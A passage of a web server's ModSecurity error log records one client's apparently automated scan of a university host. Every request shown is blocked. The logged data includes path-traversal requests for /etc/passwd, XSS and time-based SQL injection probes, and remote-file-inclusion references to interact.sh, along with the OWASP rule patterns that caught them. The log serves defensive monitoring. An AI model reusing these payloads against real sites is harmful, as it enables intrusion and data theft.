"CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn0GbIAAAAa"]
[Tue Aug 29 11:52:09.598795 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnd3E4AAAAI"]
[Tue Aug 29 11:52:09.660108 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAoCWEkAAAAB"]
[Tue Aug 29 11:52:10.585354 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnIln4AAAAV"]
[Tue Aug 29 11:52:11.625464 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAjdQaMAAAAZ"]
[Tue Aug 29 11:52:11.699388 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAn95@UAAAAD"]
[Tue Aug 29 11:52:12.640001 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnoOpgAAAAf"]
[Tue Aug 29 11:52:13.544057 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAfWOMQAAAAL"]
[Tue Aug 29 11:52:13.595029 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAlUlqMAAAA0"]
[Tue Aug 29 11:52:14.558635 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAjdQbEAAAAZ"]
[Tue Aug 29 11:52:14.663712 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnIlpIAAAAV"]
[Tue Aug 29 11:52:14.719149 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAjdQbQAAAAZ"]
[Tue Aug 29 11:52:15.543821 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnn2BwAAAAe"]
[Tue Aug 29 11:52:15.623314 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAnTlNoAAAAA"]
[Tue Aug 29 11:52:16.636675 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnjjNQAAAAX"]
[Tue Aug 29 11:52:16.667652 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAnkwg0AAAAY"]
[Tue Aug 29 11:52:17.703983 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAn95-sAAAAD"]
[Tue Aug 29 11:52:17.911063 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnn2CcAAAAe"]
[Tue Aug 29 11:52:17.930845 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnTlOYAAAAA"]
[Tue Aug 29 11:52:19.719327 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAoEZMkAAAAB"]
[Tue Aug 29 11:52:20.620482 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hMCo-f0AAAoEZMoAAAAB"]
[Tue Aug 29 11:52:21.214354 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAni-BUAAAAU"]
[Tue Aug 29 11:52:21.926619 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAnkwiQAAAAY"]
[Tue Aug 29 11:52:23.614600 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnjjN0AAAAX"]
[Tue Aug 29 11:52:24.863515 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAn96A4AAAAD"]
[Tue Aug 29 11:52:24.921968 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAnjjOEAAAAX"]
[Tue Aug 29 11:52:25.577459 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAnjjOIAAAAX"]
[Tue Aug 29 11:52:26.546575 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAn96BEAAAAD"]
[Tue Aug 29 11:52:26.548723 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoN9cMAAAAJ"]
[Tue Aug 29 11:52:26.640220 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAnjjOcAAAAX"]
[Tue Aug 29 11:52:26.640928 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAn401AAAAAW"]
